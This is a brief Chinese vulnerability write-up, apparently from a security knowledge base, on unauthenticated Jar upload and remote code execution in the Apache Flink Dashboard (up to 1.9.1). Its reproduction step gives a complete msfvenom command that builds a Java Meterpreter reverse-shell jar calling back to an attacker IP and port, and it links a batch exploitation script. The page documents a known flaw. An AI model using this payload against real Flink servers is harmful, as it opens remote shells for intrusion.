Apache Flink Dashboard 未授权访问-远程代码命令执行

一、漏洞简介

Apache Flink的任意Jar包上传导致远程代码执行的漏洞

二、漏洞影响

<= 1.9.1(最新版本)

三、复现过程

1、

msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.20.166 LPORT=8989 -f jar > rce.jar

image

2、

上传alewong Jar包

image

image

批量脚本

https://github.com/ianxtianxt/Apache-Flink-Dashboard-rec

Ps:
当注释掉 if 'Unable to load requested file' in str(data):
之后,出现Token为空,或者 Unauthorized request 时候是不存在未授权访问的,而是带授权
零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-11-13 12:19:32

results matching ""

    No results matching ""